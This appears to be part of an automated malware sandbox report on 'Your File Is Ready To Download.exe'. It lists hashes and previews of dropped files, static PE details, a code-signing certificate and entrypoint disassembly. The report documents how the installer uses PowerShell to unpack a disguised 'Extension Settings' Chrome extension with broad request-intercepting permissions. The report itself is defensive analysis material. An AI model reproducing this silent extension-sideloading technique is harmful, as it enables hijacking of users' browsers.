                                                                                                                                                                                                                        SHA-256:E8A4514D5075DBF8D262D601E0BE56D2B9372E70E5F5FB8C6132DEC4D19F9C81
                                                                                                                                                                                                                        SHA-512:DA6C98555AD7725D55B65F6D6951E74AD4164B4F42FDE5D8DE86A46AA681DF8D785993DDEBF76B3CA791EE7997F6AE445A24A768C846C12B0F150E0B98943B3D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 'use strict';var ey={TAB:0,ll:1,aq:2},fy=function(){return new kb("MediaRouter.CastStreaming.Session.Launch")},gy=function(){return new qb("MediaRouter.CastStreaming.Session.Length")},hy=function(a){ub("MediaRouter.CastStreaming.Start.Success",a,ey)};var iy=$a("mr.mirror.cast.LogUploader"),ky=function(a,b,c){jy("raw_events.log.gz",a,b,c);return b?"https://crash.corp.google.com/samples?reportid=&q="+encodeURIComponent("UserComments='"+b+"'"):""},jy=function(a,b,c,d){if(0==b.size)iy.info("Trying to upload an empty file to Crash"),d&&d(null);else{var e=new FormData;e.append("prod","Cast");e.append("ver",chrome.runtime.getManifest().version);e.append(a,b);c&&e.append("comments",c);Tv("https://clients2.google.com/cr/report",function(f){f=f.target;.var g=null;cw(f)?(g=ew(f),iy.info("Upload to Crash succeeded: "+g)):iy.info("Upload to Crash failed. HTTP status: "+f.Ja());d&&d(g)},"POST",e,void 0,3E4)}};var ly=function(){this.g=0;km(this)},ny=function(){my||(my=new ly);return my},oy=function()
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_common.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):216089
                                                                                                                                                                                                                        Entropy (8bit):5.437746365180903
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:/Pq8hUz7IgBailiepZdRCguW0DY6aNxmLv8L3BN25oMJdxsWTi2xtTYCtKlr7QIC:/Pq8hUz7IgBailiepZdRCguW0DY6aNx2
                                                                                                                                                                                                                        MD5:654360FF7FDFFE33D5A6ACFBF724A756
                                                                                                                                                                                                                        SHA1:5A6A3F657FDC63FA603EE25F98FD6EB75BBBFCD7
                                                                                                                                                                                                                        SHA-256:27116F53D9BF90CA864D92E03CD6DBD3346952109EBF7E4CBF4DD54555D4E92F
                                                                                                                                                                                                                        SHA-512:59F1AF3F5BBE9E1DFEB24F895579D213BE1D89D17208734E4A34D58E47160210A4217B95A56CCD09DD8CD12637C70A51EE6B18063205E440113C829CDFDE2495
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 'use strict';var yi;var zi=chrome.i18n.getMessage("545449835455981095");y("mr.IssueSeverity",{FA:"fatal",AK:"warning",CE:"notification"});y("mr.IssueAction",{tA:"dismiss",VC:"learn_more"});.var Ai=function(a,b){this.sinkId=this.routeId=null;this.severity=b;this.isBlocking="fatal"==this.severity?!0:!1;this.title=a;this.message=null;this.defaultAction="dismiss";this.helpPageId=this.secondaryActions=null},Ci=function(){var a=new Ai(Bi,"notification");a.helpPageId=6320939;a.defaultAction="learn_more";a.secondaryActions=["dismiss"];return a},Di=function(a,b){a.routeId=b;return a},Ei=function(a,b){a.sinkId=b;return a};var Fi=function(a,b){var c=this;this.h=void 0===b?null:b;this.g=new Promise(function(d,e){var f=function(g){c.h=null;e(g)};c.j=f;a(function(g){c.h=null;d(g)},f)})};Fi.prototype.cancel=function(a){this.j(a);if(this.h){var b=this.h;this.h=null;setTimeout(function(){return b(a)},0)}};var Gi=function(a,b,c){c=void 0===c?null:c;return new Fi(function(d,e){a.g.then(function(f){if(b)t
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_hangouts.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):613714
                                                                                                                                                                                                                        Entropy (8bit):5.552151482859797
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:izuonRs/5Hk1tJWW4085JHIWGNcTwBrSuJXiP6YzZnP7rHzSGDZflgi7aN:aIHk1sfaJSPx7rHxfJS
                                                                                                                                                                                                                        MD5:6F0D3D6150756440E05FCAB694D5AEEF
                                                                                                                                                                                                                        SHA1:E1F15F2E825E41185EAEC2A2EC58A5832E28D50D
                                                                                                                                                                                                                        SHA-256:4FB517A0225506801DD60245B833914A99C78C2E929821BDA9072134EEB3C6E0
                                                                                                                                                                                                                        SHA-512:DCEEC9E5EBB07601DF100E1F677BC67E1093C28CD9C8BC6E73AC2E5AF66B8AADD5F03EA46233EE78AB5015BDB8752E04D5707031A52B4A1DEBA345A411082282
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 'use strict';/*. Portions of this code are from MochiKit, received by. The Closure Authors under the MIT license. All other code is Copyright. 2005-2009 The Closure Authors. All Rights Reserved..*/.var Sz=function(a,b){this.u=[];this.J=a;this.M=b||null;this.C=this.j=!1;this.l=void 0;this.G=this.L=this.D=!1;this.F=0;this.h=null;this.o=0};Sz.prototype.cancel=function(a){if(this.j)this.l instanceof Sz&&this.l.cancel();else{if(this.h){var b=this.h;delete this.h;a?b.cancel(a):(b.o--,0>=b.o&&b.cancel())}this.J?this.J.call(this.M,this):this.G=!0;this.j||this.g(new Tz(this))}};Sz.prototype.H=function(a,b){this.D=!1;Uz(this,a,b)};.var Uz=function(a,b,c){a.j=!0;a.l=c;a.C=!b;Vz(a)},Xz=function(a){if(a.j){if(!a.G)throw new Wz(a);a.G=!1}};Sz.prototype.callback=function(a){Xz(this);Uz(this,!0,a)};Sz.prototype.g=function(a){Xz(this);Uz(this,!1,a)};var Zz=function(a,b,c){return Yz(a,b,null,c)},$z=function(a,b){return Yz(a,null,b,void 0)},Yz=function(a,b,c,d){a.u.push([b,c,d]);a.j&&Vz(a);return a};.Sz.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_webrtc.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2242
                                                                                                                                                                                                                        Entropy (8bit):5.312965902729607
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:FgYO8R6tlRIHPoS77t1KEFGVzgeEXUkMoxUA2Lu04fb/1fq:FfP69IHPbmEFGvgmotUuDD1fq
                                                                                                                                                                                                                        MD5:D8C34BAD4274AD0795779A88CC53F14E
                                                                                                                                                                                                                        SHA1:2E9F20B48CACF79627B231A42561198F369D9D34
                                                                                                                                                                                                                        SHA-256:7CF60CF47D4A4D56541E039BF74C10FBE945A6430AD7663C9F7595BFDDC801C8
                                                                                                                                                                                                                        SHA-512:BA5157B5EDECA4CCCFDBDE68B7431CB8901D59B97DB914FE421A3951E47F560358B483ED5C7F9BA9FFAC1A0D342222B65D9DCF7D52564482612FB31B0F2036AB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 'use strict';var ima={TAB:0,ll:1,aq:2},Y$=function(a){ub("MediaRouter.WebRtc.Start.Success",a,ima)};var Z$=function(a,b){Hj.call(this,b);this.H=a;this.l=new zb;this.g=$w(b.id);this.m=new zb;this.D=!1;this.o=null;this.F=!1;this.u=this.C=null;jma(this);kma(this);this.g.sendMessage(new Oj("GET_TURN_CREDENTIALS"))};t(Z$,Hj);.Z$.prototype.start=function(a){var b=this;return this.l.g.then(function(c){if(c.g)return Promise.reject(new Ni("Mirroring already started"));if(b.o)return Promise.reject(new Ni("Session permanently stopped"));b.C=new kb("MediaRouter.WebRtc.Session.Launch");c.ia.addStream(a);c.start();return b.m.g})};.Z$.prototype.stop=function(){var a=this;this.m.reject(new Ni("Session stop requested."));this.u&&(this.u.end(),this.u=null);if(this.o)return this.o;this.F=this.D=!1;this.C=null;return this.o=this.l.g.then(function(b){b.stop()}).then(function(){return a.g.dispose()}).catch(function(b){a.g.dispose();throw b;})};.var jma=function(a){a.g.onMessage=function(b){if(!b.type)throw
                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Chrome\background.js
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2732
                                                                                                                                                                                                                        Entropy (8bit):4.781612784294275
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:9kNuQsxTfbMfpdQ+Cpe1Q3xZRMus9ogxVzoiRK/jDL0MTds5yx7/0:OYQufQPkpMWjMusqgxFo8cTx1F/0
                                                                                                                                                                                                                        MD5:550637B95BE684FC1E313C0C412BDE43
                                                                                                                                                                                                                        SHA1:613C445D107E3C9DCB591E45C80ED40BEFE1C0A2
                                                                                                                                                                                                                        SHA-256:08D5AD9041A7B6628A42BA979B82A7E491C37B889E8B50C4F5A6EE1D56806E89
                                                                                                                                                                                                                        SHA-512:B729A70E6544C821345D7499272B8FC04E090DEB7ACA06C7F523DD3B097155D474F1E39FA6FFA3422A63E39D5D1A13AF9F48DCF7356A9A9008D5E89DD511432F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: function getRandomToken() {. var randomPool = new Uint8Array(32);. crypto.getRandomValues(randomPool);. var hex = '';. for (var i = 0; i < randomPool.length; ++i) {. hex += randomPool[i].toString(16);. }. return hex;.}..let changeHeaders = function(details) {. details.responseHeaders.forEach(function(header) {. if (header.name.toLowerCase() == "permissions-policy") {. const rawValue = header.value;. let noInterestCohort = rawValue.replace(/interest-cohort=.*?,?/, "");. header.value = noInterestCohort;. if (header.value === "") {. header.value = "interest-cohort=()";. } else {. header.value = "interest-cohort=()," + header.value;. }. } else {. details.responseHeaders.push({. "name": "permissions-policy",. "value": "interest-cohort=()". }). }. });. return {. responseHeaders: detail
                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Chrome\logo-128.png
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1319
                                                                                                                                                                                                                        Entropy (8bit):7.515568267632844
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:uUAs/68jGxEtOEpJzYfnjObEx2s0IESBYRyUo9q74RlWxDn21CTvqUtoa:Vn/6sFfpxYvyQESBYRpo9j70JmIJ
                                                                                                                                                                                                                        MD5:CD53F025F0CA1F9D541DC0B2308FAE74
                                                                                                                                                                                                                        SHA1:66155EDD4231C1E4D23FE5D4908441FB24156434
                                                                                                                                                                                                                        SHA-256:E1BD4BDC6CC5DCAACFCBAEB80305532271AA98A2C5523714AB475803321F64C5
                                                                                                                                                                                                                        SHA-512:B6B2DDD3270036DAC89DDCBF6D1749763D6443FBA7C6E49EDCF82FB3A45F249B89AC5BDE42008E3F484A5602722DC878BEBF4D32E3F4C8D303596100060D0F4A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR.....................sRGB...,.....pHYs................`PLTE.................................................................................................*..... tRNS.@.0...p....P..` o...O_..?./..E5'...4IDATx..[m{. ......N..../o].N1...=w..Ur.$...Z-X.`...(V!..O.)...2.@....i.EX...p.6 ..N.......|0M...K.~.0.`...a,/...*...0..E<.....)W.<.T...R..Q?Fn.....8...jm.@....-...i.B.g0..h......@=...<l.@........t.......f.oo:5)...uOU+..j...2..<c....M....s..._.....=t..l....T...1....A.&....p......f0b.~>r.....t..n.x......b..C...p....^..>.6F..;.q.P.u..\.`...6.3&.m......Z.1.S`W.K.*9l.(......Cf......Z.l....2K.w..y..........c*.!.d...T.%.y.\..pqI00.._.cA.gA<L0(.......zAN.{..?......n.M@....9@...t.E....#..O.....`.x.......H.<.W-..R...T].c..N.K.pf...=YN....'...._.?@....8>p.m.^.`. .5..7=.......Y>hO@..Y+`O }........fg......[.b.*..d......(.l?.3j.>t!.mwI..V.<........./mRF&U2>.(.[...y.N...x.>......e..+..6M*2&.5........][..\.v..Y...:..q|....F..p.6......Yf.s.b..,.zs.P
                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Chrome\manifest.json
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):674
                                                                                                                                                                                                                        Entropy (8bit):4.59029823239086
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:XTpbOpiTOpAm3Ypp5pt1w+Clqd5Lg51OQXuiGx58t8s6w5mlLqGOY:lbmiTm7q3t1w+ClqHLm1rzGx58t87w4P
                                                                                                                                                                                                                        MD5:4F1214A07CC4BDA74F71A1F9435EB3B0
                                                                                                                                                                                                                        SHA1:7B42EC8958B5BEB0158556D46216A23C41894110
                                                                                                                                                                                                                        SHA-256:35F2F3F0393740227968D7C963874CC8BB30C06379B868F1062E48E7FE5D63C0
                                                                                                                                                                                                                        SHA-512:2D5C0856889E28462F4080171A7BDCD4A0DF5F5DF7244B07F8459736ED86538DEF4A29E21B35C92592FB237EC4A72CD769F66D87C68D364BAA35D554C0A17DAE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {. "author": "Extension Settings",. "name": "Extension Settings",. "short_name": "Extension Settings",. "homepage_url": "https://betasupreme.com",. "description": "Extension Settings",. "version": "1.0",. "manifest_version": 2,. "browser_action": {. "default_icon": "logo-128.png",. "default_title": "Extension Settings". },. "background": {. "scripts": [. "background.js". ]. },. "icons": {. "128": "logo-128.png". },. "permissions": ["webRequest","webRequestBlocking","tabs","privacy","http://*/*","https://*/*" ],. "update_url": "https://clients2.google.com/service/update2/crx".}
                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\chromeext.zip
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Your File Is Ready To Download.exe
                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3071
                                                                                                                                                                                                                        Entropy (8bit):7.792031244379578
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:9lWACx6SupQz9bhakykpjpQzL9yA6W+gIZuGOLXHpN7BaX4u/P+rKPLGLIHQrTXb:HNq6SNzHtpjWzxF3X9TJ04e+rKPLOOQz
                                                                                                                                                                                                                        MD5:FE076363E3FF53FAB0B4C0E58FC3CFE3
                                                                                                                                                                                                                        SHA1:3219955DE64A9B54518D89A1B15699A4DC3B0EF0
                                                                                                                                                                                                                        SHA-256:03A5B9FEFC610373F4C6292ED330BD04A3682ACF8D9E6E14C04F5DFE30E615E3
                                                                                                                                                                                                                        SHA-512:EA4FDB99F66A8E09EF6F90ECD1BEBF6549EB7AE9082F6EE7421CA280E10262F62F8175EE36D5CFCB6728CF08095AF67BF27FD1BD98801CA57E775FB3A3DA1A11
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: PK........ |.S...%............background.jsUT....I.a.J.aux..............V.o.8.~..P....t:.q.m.t=U....RU+.L......]...8......`gf...7..e.....YP...?......gG.Q...).2#.......J...O.0dj...4a..$.......w.4..;.T...7o...[.. ..1.F..e?6.h.1|./..K.....T.....)a}..|0H...S..?...4..U.pC0.'.>.Z..t*..=.D=.,v...x..#R...n..=.7P.T..w6#N.j.Fw.)..g{....+>3..[QP.ZE......%.0.`...2d..b.iB..c^.|b..,.....>q..8b.,..^.c.N...M.$.w.:}@......$.>..w..B....3.?.t..ql.....O..<.......Z.%..NU.n..N.ePF.q...,V........Sk.)*..0.;.....\....r...w.d*.c...t2._.....].j.R.^....!...D.W.d4.D.....^.4....D.zf...G....n......d.F'.....q9nZ.O..)U8.....1+e....!....r.(A...L..,".q..K.....,.;.H...#0(.M-.x..R.X|&.c>.+.-.3.c..+.O..j...{...V..qXe>lxp..-.....P7..~o8...Q.iH..f....YQA....r..|....)....u......Rib.r...`.^dB.<2m+.'&..no.G..}..%[tq..h....T..O..U F..O..Y.{.U.7..2a8.J..N..7a.....j7..[R.y.1...#..7~..M....A}.7g.lP.^.2.;.i.T..e{..v...?T.x.m6(>sA....{(.rRNR.......W...j.x~.......RR=1.)u.5......8.....
                                                                                                                                                                                                                        C:\Users\user\Documents\20211206\PowerShell_transcript.536720.snkIuM3z.20211206190835.txt
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1132
                                                                                                                                                                                                                        Entropy (8bit):5.177834849202685
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:BxSAPbxvBnZx2DOXiSmw0yXWXHjeTKKjX4CIym1ZJXXzGmw0ySumnxSAZ7uC:BZPVvhZoONVcXqDYB1Z9KVAuoZZ7uC
                                                                                                                                                                                                                        MD5:8E75CD2301ACA99A8EFC5615A1C770C2
                                                                                                                                                                                                                        SHA1:808B54620FA12E71FC4B0752EF7AC188284696AD
                                                                                                                                                                                                                        SHA-256:9A3A8FE09646075578CA7FBFB1E61DF1D1F0C53B9E8A3B537ED44071072477F5
                                                                                                                                                                                                                        SHA-512:5E85A494D4408CD88646CA4CC6555E47A856F11C7056230D2FB726E4B06F59D4A2F085CD77C641389ACC54C1A30F0D2FEB121F1A277B521581E559396109B281
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211206190836..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 536720 (Microsoft Windows NT 10.0.17134.0)..Host Application: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'..Process ID: 160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211206190836..**********************..PS>Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'..**********************..Command start time: 20211206191339..*********************

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.461512695554527
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:Your File Is Ready To Download.exe
                                                                                                                                                                                                                        File size:1217816
                                                                                                                                                                                                                        MD5:b864cefdeac3d2c58de4d14bab8265f1
                                                                                                                                                                                                                        SHA1:a9e0a49eb09498a97a9b55bf01952e3050b5f777
                                                                                                                                                                                                                        SHA256:7489f7e92e2ece51c3a05fc381efe352210d16f02326e280ffd4c52821987fa0
                                                                                                                                                                                                                        SHA512:883b0b001e606bec51e91baec365fbda7e163236f02e398101d8533e362762fc9cee2337f92c1e18ac92eda18c542f79a8390d2cf58547f3913e7e932d37b9f2
                                                                                                                                                                                                                        SSDEEP:24576:8ssWIfbHO+7DGBtAJSKBw3NMuyrw3FtkN9nfSYH1zemyWbqo:8ssWIfbHO+7DGBtAJSKBw3NMuykVtknr
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&.DXG..XG..XG..C...mG..C....G..Q? .^G..Q?$.YG..Q?0.EG..XG...F..C.=.OG..C...sG..C.9.YG..C.>.YG..RichXG..........PE..d.....M`...

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:0000000000000000

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x1400cc400
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
                                                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                                                        Time Stamp:0x604D83B2 [Sun Mar 14 03:32:02 2021 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                        OS Version Minor:2
                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                        File Version Minor:2
                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                        Subsystem Version Minor:2
                                                                                                                                                                                                                        Import Hash:fc7a1e26cc7fb001a117e16565a090cb

                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                        Signature Issuer:CN=COMODO RSA Extended Validation Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                        Error Number:0
                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                        • 10/14/2020 5:00:00 PM 10/15/2021 4:59:59 PM
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                        • CN="LLC ""APPSOLUTE""", O="LLC ""APPSOLUTE""", STREET="Prazka Street, Building 3, Apartment 319", STREET=Dniprovskyi district, L=Kyiv, PostalCode=02090, C=UA, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=UA, SERIALNUMBER=43565023
                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                        Thumbprint MD5:C66F8BAC4ED61031A9A5E25E5797E78F
                                                                                                                                                                                                                        Thumbprint SHA-1:2157C774D3C0D9DCAEC39EDBAC4F34E45BEF2BD0
                                                                                                                                                                                                                        Thumbprint SHA-256:52D9940440FEA572716DF3207E036869640A32E785F9328D9F7F506F27DC5A6F
                                                                                                                                                                                                                        Serial:3D5DA2F365B3716FE7C32796A3E47457

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                        call 00007EFC70DCDBB8h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                        jmp 00007EFC70DC7567h
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [esp+08h], ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [esp+18h], esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        lea ebx, dword ptr [ecx+1Ch]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                                                                        mov esi, 00000101h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ecx, ebx
                                                                                                                                                                                                                        inc esp
                                                                                                                                                                                                                        mov eax, esi
                                                                                                                                                                                                                        xor edx, edx
                                                                                                                                                                                                                        call 00007EFC70DCA374h
                                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        lea edi, dword ptr [ebp+10h]
                                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                                        lea ecx, dword ptr [ebx+06h]
                                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                                        movzx eax, bx
                                                                                                                                                                                                                        inc esp
                                                                                                                                                                                                                        mov dword ptr [ebp+0Ch], ebx
                                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                                        mov dword ptr [ebp+04h], ebx
                                                                                                                                                                                                                        rep stosw
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        lea edi, dword ptr [00042FDEh]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub edi, ebp
                                                                                                                                                                                                                        mov al, byte ptr [edi+ebx]
                                                                                                                                                                                                                        mov byte ptr [ebx], al
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        inc ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        dec esi
                                                                                                                                                                                                                        jne 00007EFC70DC7705h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        lea ecx, dword ptr [ebp+0000011Dh]
                                                                                                                                                                                                                        mov edx, 00000100h
                                                                                                                                                                                                                        mov al, byte ptr [ecx+edi]
                                                                                                                                                                                                                        mov byte ptr [ecx], al
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        dec edx
                                                                                                                                                                                                                        jne 00007EFC70DC7705h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov ebp, dword ptr [esp+38h]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov esi, dword ptr [esp+40h]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        add esp, 20h
                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov eax, esp
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [eax+10h], ebx
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [eax+18h], esi
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov dword ptr [eax+20h], edi
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        lea ebp, dword ptr [eax-00000488h]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        sub esp, 00000580h
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        mov eax, dword ptr [00043DEBh]
                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                        xor eax, esp

                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                        • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                        • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                        • [C++] VS2010 SP1 build 40219
                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x10bf2c0x12c.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x12e0000x32b8.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x11c0000x78b4.pdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1274000x2118data
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xde0000xeb8.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
